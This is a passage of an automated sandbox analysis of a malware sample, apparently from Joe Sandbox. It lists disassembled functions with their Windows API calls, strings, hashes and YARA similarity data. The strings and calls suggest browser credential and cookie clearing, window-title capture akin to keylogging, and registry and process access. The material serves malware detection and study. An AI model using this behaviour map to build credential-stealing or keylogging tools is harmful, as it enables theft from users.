                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3360349984-0
                                                                                                                                                                                                                                            • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                                            Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                                                                                                                                                            • Opcode ID: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                                                                                                                                                                                                            • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                                                                                                                                            Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                            • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                                            • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                                                                            • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                                                                                                                                            Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                                                                                                                                              • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                                                                                                                                              • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                            • String ID: [ $ ]
                                                                                                                                                                                                                                            • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                            • Opcode ID: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                                                                                                                                                                                                            • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                                                                                                                                            Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                            • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                                                                                                                                            Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                            • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                                                                                                                                            Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                            • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                                                                                                                                            Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                                                                                                                                              • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                                                                                                                                              • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                                                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 737400349-0
                                                                                                                                                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                            • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                                                                                                                                            Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                            • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                                                                                                                                            Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3919263394-0
                                                                                                                                                                                                                                            • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                            • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                                                                                                                                            Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                                                                                                                            • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                            • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                                                                                                                                            Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 39102293-0
                                                                                                                                                                                                                                            • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                            • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                                                                                                                                            Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                            • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                                                                                                                                            Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                            • String ID: 4[G$4[G
                                                                                                                                                                                                                                            • API String ID: 2931989736-4028565467
                                                                                                                                                                                                                                            • Opcode ID: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                                                                            • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                                                                                                                                            Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CountEventTick
                                                                                                                                                                                                                                            • String ID: >G
                                                                                                                                                                                                                                            • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                            • Opcode ID: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                                                                            • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                                                                                                                                            Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                                            • String ID: $vD
                                                                                                                                                                                                                                            • API String ID: 1807457897-3636070802
                                                                                                                                                                                                                                            • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                            • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                                                                                                                                            Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 0-711371036
                                                                                                                                                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                            • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                                                                                                                                            Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                            Strings
